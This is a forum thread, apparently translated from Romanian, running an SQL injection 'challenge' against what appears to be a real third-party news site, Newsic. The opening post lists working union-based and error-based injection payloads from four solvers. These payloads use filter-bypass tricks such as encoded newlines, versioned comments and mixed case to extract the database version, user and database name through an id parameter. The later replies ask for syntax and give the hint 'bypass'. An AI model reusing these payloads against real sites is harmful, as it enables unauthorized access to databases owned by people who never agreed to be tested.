Wubi Posted October 3, 2012 (edited)
No...
Target: News: Scene sexy per Alanis - Newsic
Method: Union Based
Requirements: User(), Database() or Version().
Proof:
The site was found by Sheyken...
[TABLE=class: grid, width: 800]
[TR][TD]Solvers:[/TD][TD]Syntax:[/TD][/TR]
[TR][TD]Sheyken[/TD][TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--[/TD][/TR]
[TR][TD]fallen_angel[/TD][TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-[/TD][/TR]
[TR][TD]neo.hapsis[/TD][TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--[/TD][/TR]
[TR][TD]Sweby[/TD][TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*[/TD][/TR]
[/TABLE]
Edited October 8, 2012 by Wubi
fallen_angel Posted October 3, 2012
You have a PM. I'm not uploading a picture anymore because I'm on Digi Mobil and it's crawling.
EterNo Posted October 5, 2012
It would be nice if, once you finish the competition, you also posted a syntax so the rest of us can understand too. I managed to find the number of columns, but after that it gives me "ACCES NEGAT" (access denied) when I write select.
Wubi (Author) Posted October 5, 2012
[QUOTE]It would be nice if, once you finish the competition, you also posted a syntax so the rest of us can understand too. I managed to find the number of columns, but after that it gives me "ACCES NEGAT" (access denied) when I write select.[/QUOTE]
If you had followed the previous challenges (https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), or even looked more carefully at the solvers table in the first post, the 2nd row is dedicated to the syntaxes used. When I decide to end the challenge I will add the syntaxes as well. Until then, keep trying. Hint: bypass.
Wubi (Author) Posted October 8, 2012
[QUOTE]When do we see the results?[/QUOTE]
Now.
Closed.